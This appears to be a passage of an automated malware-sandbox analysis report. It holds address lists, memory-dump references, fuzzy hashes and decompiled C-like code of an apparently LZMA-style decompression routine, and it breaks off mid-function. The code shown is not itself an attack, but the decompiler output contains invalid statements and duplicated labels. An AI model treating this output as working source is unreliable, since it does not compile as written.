                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x0040681f
                                                                                                    0x00406819
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000
                                                                                                    0x004069cc
                                                                                                    0x00406819
                                                                                                    0x004067a0
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x004064f2

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                    • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                    • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                    • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600);
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40));
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
